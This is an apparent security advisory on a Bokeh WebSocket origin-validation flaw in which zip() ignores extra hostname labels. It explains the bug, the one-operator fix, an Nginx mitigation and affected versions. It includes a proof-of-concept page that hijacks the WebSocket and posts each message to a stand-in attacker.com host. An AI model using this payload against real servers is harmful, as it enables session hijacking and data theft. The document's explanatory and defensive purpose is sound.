Feb 26, 2026
Bokeh's WebSocket origin validator used Python's `zip()` function, which stops comparing when the shortest list ends. Attackers can register subdomains starting with a trusted name (e.g., `trustedsite.corp.attacker.com`) to trick the server into accepting the connection, leading to full session hijacking.
A logic error in the Bokeh interactive visualization library allows attackers to bypass WebSocket Origin validation. By exploiting Python's `zip()` function behavior, attackers can craft malicious subdomains that mimic trusted origins, enabling Cross-Site WebSocket Hijacking (CSWSH) to exfiltrate data or manipulate server-side state.
Bokeh is the darling of the Python data science world. It takes heavy, server-side computation and spits out beautiful, interactive HTML/JS visualizations. To make those sliders slide and those graphs update in real-time, Bokeh relies heavily on WebSockets. It’s a persistent pipe between the browser and the backend Python process.
But here is the thing about WebSockets: they aren't bound by the Same-Origin Policy (SOP) the way XHR and Fetch requests are. A browser will happily open a WebSocket connection to any server a page points it at, carrying the user's cookies along for the ride. It is up to the server to look at the `Origin` header and say, "Hey, you're coming from `evil.com`, get lost."
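As a rough illustration of what that server-side decision looks like, here is a minimal sketch of an exact-match Origin check. The allowlist value and the function name `is_origin_allowed` are hypothetical and are not taken from Bokeh.

```python
from typing import Optional

# Hypothetical allowlist of full origins (scheme + host + optional port).
ALLOWED_ORIGINS = frozenset({"https://dashboard.example.com"})


def is_origin_allowed(origin: Optional[str]) -> bool:
    """Return True only if the Origin header exactly equals an allowed origin."""
    if origin is None:
        # No Origin header at all: treated as untrusted in this sketch.
        return False
    return origin.strip().lower() in ALLOWED_ORIGINS


print(is_origin_allowed("https://dashboard.example.com"))  # True
print(is_origin_allowed("https://evil.com"))               # False
```

Comparing whole strings for equality leaves no room for a lookalike origin that merely starts with a trusted name.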
If that check fails—or in this case, gets a little too lazy—you enter the realm of Cross-Site WebSocket Hijacking (CSWSH). It’s essentially CSRF on steroids. Instead of sending a single blind request (like "buy stock"), the attacker gets a full, two-way communication channel. They can read the response. They can see the data. In the context of Bokeh, that means they can watch your internal dashboard right alongside you.
The root cause of CVE-2026-21883 is a classic case of "it works for valid input, so ship it." The vulnerability lies in `src/bokeh/server/util.py`, specifically inside a function called `match_host`. This function is supposed to take the incoming `Origin` header and compare it against a configured allowlist.
The developers made a fatal assumption about Python's `zip()` function. For those uninitiated in Pythonic foot-guns, `zip(a, b)` takes two lists and iterates over them together. Crucially, it stops as soon as the shortest list is exhausted. It doesn't throw an error; it doesn't warn you. It just quietly packs up and goes home.
Imagine you have an allowlist containing `dashboard.corp`. You split that into `['dashboard', 'corp']`. Now imagine an attacker comes along with `dashboard.corp.evil.net`. Split that, and you get `['dashboard', 'corp', 'evil', 'net']`. When you `zip()` them, the loop runs twice. `'dashboard'` matches `'dashboard'`. `'corp'` matches `'corp'`. The loop finishes. The code hits `return True`. The server opens the door wide.
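The truncation is easy to reproduce in isolation. The snippet below uses only the two hostnames from the example above and shows which pairs `zip()` actually yields:

```python
allowed = "dashboard.corp".split(".")
incoming = "dashboard.corp.evil.net".split(".")

# zip() stops at the shorter list, so 'evil' and 'net' are never seen.
pairs = list(zip(incoming, allowed))
print(pairs)  # [('dashboard', 'dashboard'), ('corp', 'corp')]

# Every pair that zip() yields matches, even though the hostnames differ.
all_pairs_match = all(h == p for h, p in pairs)
print(all_pairs_match)      # True
print(incoming == allowed)  # False
```

Python 3.10 added `zip(..., strict=True)`, which raises `ValueError` when the inputs differ in length instead of silently truncating.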
Let's look at the crime scene. The `match_host` function was trying to be clever by splitting hostnames on periods to handle subdomains and wildcards. Here is the logic that doomed it:

    # The Vulnerable Logic
    def match_host(host: str, pattern: str) -> bool:
        host_parts = host.split('.')
        pattern_parts = pattern.split('.')
        # They checked if the pattern was longer than the host...
        if len(pattern_parts) > len(host_parts):
            return False
        # ...but forgot to check if the HOST was longer than the PATTERN.
        for h, p in zip(host_parts, pattern_parts):
            if h == p or p == '*':
                continue
            else:
                return False
        return True

See the gap? If `host_parts` is longer than `pattern_parts`, `zip` just ignores the extra parts (the `.evil.net` part). The code assumes that if it survived the loop, it's a match.
The fix (commit `cedd113`) is almost comically simple. It enforces that the lengths must match exactly (unless wildcards are involved, which are handled separately).

    # The Fix
    -    if len(pattern_parts) > len(host_parts):
    -        return False
    +    if len(pattern_parts) != len(host_parts):
    +        return False

This one-operator change (`>` to `!=`) closes the vulnerability completely. It forces the validation to acknowledge the entire hostname provided by the client.
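Applied to the simplified function from this article, the patched condition might look like the sketch below. This is the article's reduced version with the corrected length check, not the actual Bokeh source, which may handle additional cases.

```python
def match_host(host: str, pattern: str) -> bool:
    """Sketch of the patched check: every label of the host is compared."""
    host_parts = host.split(".")
    pattern_parts = pattern.split(".")

    # The patched condition: any length mismatch is a rejection.
    if len(pattern_parts) != len(host_parts):
        return False

    # Lengths are equal here, so zip() can no longer drop trailing labels.
    return all(p == "*" or h == p for h, p in zip(host_parts, pattern_parts))


print(match_host("dashboard.corp", "dashboard.corp"))           # True
print(match_host("dashboard.corp.evil.net", "dashboard.corp"))  # False
```

With the lengths forced to be equal, the attacker's extra `evil.net` labels cause a rejection before the loop ever runs.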
Exploiting this requires a bit of setup, but it is highly realistic in corporate environments where internal DNS names are predictable. Let's assume a target organization runs a Bokeh server at ws://analytics.internal.corp.
Step 1: Reconnaissance
The attacker needs to know the allowlist. Often, this is the FQDN of the server itself. If the server expects analytics.internal.corp, that is our target string.
Step 2: Infrastructure
The attacker registers a domain or configures a subdomain they control to start with the target string. For example, they register attacker.com and create a subdomain: analytics.internal.corp.attacker.com.
Step 3: The Trap
The attacker hosts a simple HTML page on `analytics.internal.corp.attacker.com`:

    <!-- Hosted on attacker's domain -->
    <script>
      // Browser sends Origin: http://analytics.internal.corp.attacker.com
      var ws = new WebSocket("ws://analytics.internal.corp/ws");
      ws.onopen = function() {
        console.log("We are in.");
      };
      ws.onmessage = function(msg) {
        // Exfiltrate sensitive dashboard data to attacker server
        fetch("https://attacker.com/log", { method: "POST", body: msg.data });
      };
    </script>

Step 4: Execution
The attacker sends the link to a victim who has access to the internal analytics dashboard. When the victim clicks, the WebSocket handshake initiates. The browser sends the attacker's domain as the Origin. The Bokeh server, blinded by the zip() flaw, sees analytics.internal.corp... and approves the connection. The attacker now receives a live feed of the victim's data.
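To see why that handshake succeeds, the sketch below replays the check offline. It restates the pre-patch logic as listed in this article under the hypothetical name `vulnerable_match_host`. Extracting the hostname with `urllib.parse.urlsplit` is an assumption made for illustration; it is not a claim about how Bokeh parses the header.

```python
from urllib.parse import urlsplit


def vulnerable_match_host(host: str, pattern: str) -> bool:
    """The pre-patch logic as listed in this article."""
    host_parts = host.split(".")
    pattern_parts = pattern.split(".")
    if len(pattern_parts) > len(host_parts):
        return False
    for h, p in zip(host_parts, pattern_parts):
        if h != p and p != "*":
            return False
    return True


# The Origin header the victim's browser sends from the attacker's page.
origin = "http://analytics.internal.corp.attacker.com"
host = urlsplit(origin).hostname
print(host)  # analytics.internal.corp.attacker.com
print(vulnerable_match_host(host, "analytics.internal.corp"))  # True
```

Only the first three labels are ever compared, so the trailing `attacker.com` never influences the result.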
You might think, "So what? They see a scatter plot." But Bokeh is an interactive library. The communication channel handles events. If the dashboard has widgets—buttons that trigger database refreshes, sliders that adjust parameters, or text inputs that run queries—the attacker can trigger those too.
Because WebSockets are bidirectional, the attacker can send messages to the server as if they were the user. In a worst-case scenario where the dashboard allows executing SQL queries or Python code based on input (which is bad design, but we see it constantly), this becomes Remote Code Execution (RCE) or SQL Injection via WebSocket.
Even without RCE, the confidentiality loss is massive. These dashboards often display proprietary trading data, patient health metrics, or infrastructure status. Bypassing the Origin check effectively bypasses the firewall for the application layer.
If you are running Bokeh <= 3.8.1, you are vulnerable. The primary fix is to upgrade to 3.8.2 or later immediately. The patch is small and safe to backport if you are stuck on a legacy version.
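A quick way to triage an environment is to compare the installed version against the fixed release. The helper below is a hypothetical sketch: it takes a version string, looks only at the leading numeric release, and ignores pre-release or development suffixes, so treat its answer for such builds as unreliable.

```python
import re
from typing import Tuple

FIXED_RELEASE = (3, 8, 2)  # first fixed version, per this advisory


def release_tuple(version: str) -> Tuple[int, ...]:
    """Extract the leading numeric release, e.g. '3.8.1' -> (3, 8, 1)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.group().split("."))


def is_affected(version: str) -> bool:
    """True if the numeric release predates the fixed version."""
    return release_tuple(version) < FIXED_RELEASE


print(is_affected("3.8.1"))  # True
print(is_affected("3.8.2"))  # False
```

In a live environment, the version string could be obtained with `importlib.metadata.version("bokeh")` and passed to `is_affected`.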
However, relying solely on application-level checks is playing with fire. You should enforce Origin validation at your ingress point—your reverse proxy.
If you use Nginx, an explicit, fully anchored match is your friend:

    location /ws {
        proxy_pass http://backend;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        # Strict check: the pattern is anchored at both ends,
        # so nothing may follow the trusted host.
        if ($http_origin !~* "^https?://(analytics\.internal\.corp)$") {
            return 403;
        }
    }

By killing the request at the Nginx layer, the vulnerable Python code never even executes. Defense in depth means never trusting a `zip()` loop with your perimeter security.
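Before deploying a rule like this, it helps to check the pattern against a few origins offline. The sketch below applies the same regular expression with Python's `re` module, on the assumption that it behaves the same as Nginx's regex engine for a pattern this simple. The function name `proxy_would_allow` is hypothetical.

```python
import re

# Same pattern as the Nginx rule above; re.IGNORECASE mirrors the "~*" operator.
ORIGIN_PATTERN = re.compile(r"^https?://(analytics\.internal\.corp)$", re.IGNORECASE)


def proxy_would_allow(origin: str) -> bool:
    """True if the Origin matches, i.e. the rule would not return 403."""
    return ORIGIN_PATTERN.search(origin) is not None


print(proxy_would_allow("http://analytics.internal.corp"))               # True
print(proxy_would_allow("http://analytics.internal.corp.attacker.com"))  # False
print(proxy_would_allow("http://analytics.internal.corp:8443"))          # False
```

The last case is worth noting: the pattern as written also rejects an origin that carries an explicit port, so it would need an optional port group if the dashboard is served on a non-default port.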
`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Bokeh (Bokeh Project) | <= 3.8.1 | 3.8.2 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-1385 |
| Attack Vector | Network |
| CVSS Score | 4.5 (Medium) |
| Impact | Data Exfiltration / Session Hijacking |
| Root Cause | Logic Error in List Iteration |
| Patch Status | Available (v3.8.2) |
The application does not verify or incorrectly verifies the Origin header of a WebSocket connection, allowing an attacker to establish a connection from an unauthorized origin.